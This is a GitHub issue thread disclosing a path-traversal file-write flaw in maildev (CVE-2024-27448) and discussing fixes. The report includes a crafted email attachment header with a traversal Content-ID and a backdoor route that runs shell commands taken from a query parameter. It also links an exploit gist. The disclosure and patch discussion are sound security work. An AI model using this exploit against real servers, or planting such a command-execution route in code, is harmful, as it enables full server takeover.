### ISSUE TITLE
[Vulnerability] Arbitrary File Write leading to Remote Code Execution (RCE)

### ISSUE THREAD

**Issue by stypr** [maildev/maildev#467]
We (The organizing members of the international cybersecurity competition CODEGATE - https://codegate2023.org/) have found a vulnerability that could possibly overwrite any files by sending a malicious e-mail to port 1025.

This vulnerability could possibly force-write existing sourcecodes and could completely takeover the server.

## Explanation

https://github.com/maildev/maildev/blob/357a20edcd205413d3590aedb8fcd7c97563c40d/lib/mailserver.js#L92-L100

There is no path sanitization done when files are sent with a malicious `contentId`. This means, it is possible to do a path traversal to access the parent directory and overwrite any files.

For example, when a mail with the following content is sent to a server in port 1025, `lib/routes.js` will be overwritten and the malicious code will start to be affected from next restart of the process. There is no user interaction required to achieve this attack. 

The following mail content was tested on the latest Docker instance (`soulteary/maildev:latest`) and was found to be exploitable.

```
...
--mixed-content-malicious
Content-Type: image/png; charset=UTF-8; filename="a.png"
Content-ID: <../../../home/node/lib/routes.js>
Content-Transfer-Encoding: base64
Content-Disposition: inline

... ( some malicious base64 content ) ...

--mixed-content-malicious--
```

content of the encoded base64 content
```
/**
 * MailDev - routes.js
 */
const express = require('express')
const compression = require('compression')
const pkg = require('../package.json')
const { filterEmails } = require('./utils')
...
  // Health check
  router.get('/healthz', function (req, res) {
    res.json(true)
  })

  // Malicious Endpoint
  router.get('/malicious_command_running_endpoint', function(req, res) {
    res.json(require("child_process").execSync(req.query.cmd).toString())
  })
...
...
```

**Comment by stypr** [comment]
Would be really appreciated to check on this issue immediately.. 
@maildev / @djfarrelly / @soulteary

**Comment by albanm** [comment]
FYI I have found the [resolve-path](https://www.npmjs.com/package/resolve-path) module useful to fix this type of vulnerability.

**Comment by stypr** [comment]
CVE assigned for this bug I guess [CVE-2024-27448](https://nvd.nist.gov/vuln/detail/CVE-2024-27448)

**Comment by stypr** [comment]
I'm closing the issue since the vulnerability seems to be patched.

**Comment by stypr** [comment]
The exploit gist is here as for the reference: https://gist.github.com/stypr/fe2003f00959f7e3d92ab9d5260433f8
There is a way to force-crash (DoS) the instance so that the backdoor is loaded upon the restart of the process. I didn't add that on it.

**Comment by mtrefzer** [comment]
Any updates on a fix for this CVE?

**Comment by stypr** [comment]
@mtrefzer 

The maintainer has been away for more than a year, so you probably have to fix the code on your own.

The patch suggested at https://github.com/maildev/maildev/pull/487 looks good to me as for a temporary fix, but there is a high chance of vulnerability to reoccur when vendor packages are updated to newer version.

My suggested fix would be to just replace the path traversal patterns to some other typical character on `attachment.contentId`.

Something like this should possibly prevent from arbitrary file write. (`maildev/lib/mailserver.js`)

```js
 function saveAttachment (id, attachment) { 
   if (!fs.existsSync(path.join(mailServer.mailDir, id))) { 
     fs.mkdirSync(path.join(mailServer.mailDir, id)) 
   } 
   const output = fs.createWriteStream( 
     path.join(mailServer.mailDir, id.replace(/(\.\.|:|\/|\\)+/g, '-'), attachment.contentId.replace(/(\.\.|:|\/|\\)+/g, '-')) 
   ) 
   attachment.stream.pipe(output) 
 } 
```

**Comment by djfarrelly** [comment]
This is fixed in #508 - will be in the next 2.x release
